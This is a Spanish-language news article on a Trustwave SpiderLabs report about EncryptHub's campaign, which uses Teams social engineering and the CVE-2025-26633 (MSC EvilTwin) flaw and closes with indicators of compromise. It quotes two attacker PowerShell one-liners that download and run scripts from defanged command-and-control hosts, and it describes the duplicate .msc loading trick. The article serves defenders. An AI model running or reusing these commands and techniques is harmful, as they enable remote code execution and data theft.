¿Aceptaste una llamada en Teams? Felicidades, ahora eres el patrocinador oficial de una operación de hackeo ajena

El equipo de investigación de Trustwave SpiderLabs ha detectado una nueva oleada de ataques atribuida a EncryptHub, en la que el factor humano y la explotación de una vulnerabilidad en Microsoft Management Console convergen en un mismo escenario. Los operadores se hacen pasar por personal de soporte, contactan a la víctima mediante Microsoft Teams, la convencen de habilitar acceso remoto y ejecutar una serie de comandos, y luego despliegan la carga útil a través del fallo CVE-2025-26633, conocido como MSC EvilTwin. Paralelamente, el grupo utiliza canales de entrega poco convencionales, como la plataforma Brave Support, lo que complica el filtrado del tráfico y el análisis posterior. En los informes también aparecen otros nombres asociados al grupo —LARVA-208 y Water Gamayun—, que previamente se ha vinculado con ataques a desarrolladores de Web3 y abuso de la plataforma Steam. Para febrero, ya se contabilizaban 618 organizaciones comprometidas en todo el mundo.

El primer paso es la ingeniería social. La víctima recibe una solicitud por Teams de un supuesto "técnico", quien insiste en abrir una sesión remota para "verificar la configuración". Una vez establecida la sesión, se ejecuta en el sistema una línea del tipo:
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-RestMethod -Uri 'hxxps://cjhsbam[.]com/payload/runner.ps1' | Invoke-Expression"
Esta llamada descarga y ejecuta el script runner.ps1, que prepara el entorno para aprovechar la vulnerabilidad de MMC.

Luego se aplica el truco del doble archivo .msc. El cargador crea dos ficheros de consola con el mismo nombre: uno legítimo que se guarda en el directorio esperado, y uno malicioso que se ubica en la ruta MUIPath, normalmente dentro de la carpeta en-US. Al lanzar la herramienta legítima, se activa el proceso mmc.exe, y debido al defecto MSC EvilTwin, este busca primero un archivo homónimo en MUIPath. Como resultado, el sistema carga el "espejo" ubicado en en-US y ejecuta el código del atacante. Aunque esta vulnerabilidad tipo día cero fue documentada públicamente en marzo de 2025, ya se habían observado archivos de este tipo en circulación desde febrero. Existe un parche, pero en equipos no actualizados, el vector de ataque sigue siendo efectivo.

Una vez implementados los archivos duplicados, runner.ps1 modifica el contenido del .msc malicioso: reemplaza el marcador htmlLoaderUrl por la dirección del centro de comando y control (C2) de EncryptHub, una cadena del tipo hxxps://cjhsbam[.]com/payload/build[.]ps1. Al recibir la URL, el archivo .msc descarga la siguiente etapa. El script build.ps1 recolecta huellas del sistema y las envía al servidor C2, configura un mecanismo de persistencia, mantiene el canal de comunicación y espera instrucciones. Los comandos llegan cifrados (AES), se descifran localmente y se ejecutan directamente en el nodo mediante Invoke-Expression. Entre los módulos comunes se encuentra el ladrón en PowerShell Fickle Stealer, que extrae archivos sensibles, información del entorno y datos de carteras de criptomonedas.

Durante la investigación surgieron herramientas adicionales escritas en Go, con las que los operadores comienzan a reemplazar los scripts en PowerShell. Una de ellas, SilentCrystal, reproduce la lógica del cargador pero se empaqueta como un binario nativo. Primero crea una carpeta pseudo-sistema "C:\Windows \System32" con un espacio después de "Windows", imitando visualmente el directorio real y confundiendo los sistemas de defensa. Luego el binario envía una solicitud POST al servidor de control con una "clave API" incrustada y un nombre de archivo aleatorio con extensión .zip; como respuesta recibe un enlace legítimo a Brave Support. Esta plataforma no permite subir archivos a usuarios comunes, lo que indica que EncryptHub posee una cuenta con privilegios de carga. El archivo se descarga desde Brave Support, se descomprime, y entonces en WF.msc se sustituye el marcador {URI} por la dirección del centro de mando. A continuación, se ejecuta la consola .msc habitual que, gracias a CVE-2025-26633, carga la versión maliciosa desde el directorio falso y ejecuta el código deseado.

Otro hallazgo es un "marcador proxy" en Go con soporte para SOCKS5. Sin parámetros, se inicia como cliente, se conecta a la infraestructura del atacante mediante datos embebidos en el binario y enruta el tráfico a través de un túnel. También existe un modo servidor: se carga un archivo con credenciales de autenticación, se genera automáticamente un certificado TLS autofirmado (con "Reverse Socks" como Common Name y localhost en el DNS), y el proceso comienza a aceptar múltiples conexiones paralelizadas mediante goroutines. Al establecerse la conexión, el agente notifica por Telegram el "inicio", enviando el nombre del usuario, el dominio obtenido desde la variable de entorno USERDOMAIN, el resultado de verificar privilegios administrativos vía net session, así como la IP pública, la geolocalización y el proveedor, usando la API https://ipinfo.io/json. El análisis de infraestructura reveló descargas de cargas útiles desde la dirección hxxps://safesurf.fastdomain-uoemathhvq.workers.dev/payload/pay[.]ps1, otro componente del mosaico C2.

Además del hosting "oficial" en recursos comprometidos, el grupo emplea falsos servicios de videollamadas. Se identificó el dominio api.rivatalk.net, vinculado a un nuevo servidor de comando. El dominio raíz rivatalk.net fue registrado a finales de julio de 2025 y diseñado como una "plataforma" con aplicación de escritorio para Windows y cliente web. La descarga de archivos EXE/MSI requiere un código de acceso, lo que actúa como filtro contra investigadores y entornos de sandboxing. Al ingresar una combinación válida, se descarga el archivo setup.msi, que instala varios componentes, entre ellos launcher.exe y un binario denominado Symantec Early Launch Anti-Malware, utilizado para cargar de forma encubierta una biblioteca falsa userenv.dll. Esta biblioteca modificada ejecuta un comando del tipo:
cmd /c powershell -nop -w hidden -c $wc=New-Object Net.WebClient;iex $wc.DownloadString('hxxps://api.rivatalk[.]net/meta/pay[.]ps1').
El script descargado muestra una ventana falsa de "System Configuration" para desviar la atención, mientras que en segundo plano se inicia una tarea que genera tráfico web simulado mediante frecuentes solicitudes HTTP a sitios populares, lo cual enmascara los paquetes reales enviados al servidor C2. Luego se obtiene el UUID del dispositivo, se mantiene una comunicación constante con el servidor de control, y las órdenes cifradas en AES se ejecutan al instante usando Invoke-Expression, lo que otorga al operador control total sobre el sistema.

El panorama general es coherente: llamada telefónica, sesión en Teams, línea única de PowerShell, archivos .msc duplicados y sustitución vía MUIPath, combinación de build.ps1 con Fickle Stealer, cargadores en Go, túneles SOCKS5, camuflaje como soporte Brave y videollamadas falsas. Esta cadena está diseñada para eludir defensas, establecer persistencia en la red y operar bajo la cobertura de procesos legítimos. Aunque ya existe un parche para CVE-2025-26633, EncryptHub sigue atacando a quienes lo han pasado por alto: donde las actualizaciones no se han aplicado o las políticas permiten ejecutar scripts sin firmar, el riesgo de compromiso sigue siendo elevado.

Los indicadores de compromiso, según Trustwave SpiderLabs, incluyen dominios y direcciones como: rivatalk[.]net, 0daydreams[.]net, cjhsbam[.]com, safesurf.fastdomain-uoemathhvq.workers[.]dev, 185.33.86.220. Estos elementos coinciden con la infraestructura descrita: enlaces de Brave Support, nodos Cloudflare Workers que distribuyen código PowerShell, y la "plataforma de videollamadas" RivaTalk que solo entrega setup.msi por invitación.